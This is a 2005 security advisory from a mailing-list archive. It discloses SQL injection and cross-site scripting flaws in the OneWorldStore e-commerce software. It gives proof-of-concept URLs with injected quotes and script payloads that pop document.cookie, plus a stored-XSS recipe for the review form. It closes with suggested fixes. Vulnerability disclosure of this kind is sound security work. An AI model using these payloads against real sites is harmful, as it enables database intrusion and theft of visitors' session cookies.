<<< Date Index >>>     <<< Thread Index >>>

Multiple multiple sql injection/errors and xss vulnerabilities in OneWorldStore




Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn 
more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple multiple sql injection/errors and xss vulnerabilities in 
OneWorldStore
Date: 14/04/2005

Vendor: OneWorldStore
Vendor Website: http://www.oneworldstore.com
Summary: There are, multiple sql injection/errors and xss vulnerabilities in 
oneworldstore.


Proof of Concept Exploits: 

http://example.com/owBasket/owAddItem.asp?idProduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT stock FROM Products WHERE idProduct = 'SQL_INJECTION
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owBasket/owAddItem.asp, line 48


http://example.com/owListProduct.asp?bSpecials='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM Categories WHERE idCategory = AND Active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owListProduct.asp, line 50


http://example.com/owListProduct.asp?idCategory='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM Categories WHERE idCategory = ''SQL AND Active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owListProduct.asp, line 50


http://example.com/owProductDetail.asp?idproduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owProductDetail.asp, line 647


http://example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owProductDetail.asp, line 647


http://example.com/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab
Pops Cookie


http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64
Pops Cookie


http://example.com/owProductDetail.asp
Submitting the review form, with someething like
Name:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Email:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E@'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.com
Rating:5
Comment: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Would cause long lasting permanent XSS and steal the cookies of anyone who 
visited the webpage.


Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), 
mysql_real_escape_string() and other functions for input validation before 
passing user input to the mysql database, or before echoing data on the screen, 
would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilties have been found and released by Diabolic Crab, Email: 
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me 
regarding these vulnerabilities. You can find me at, 
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon 
to come out book on Secure coding with php.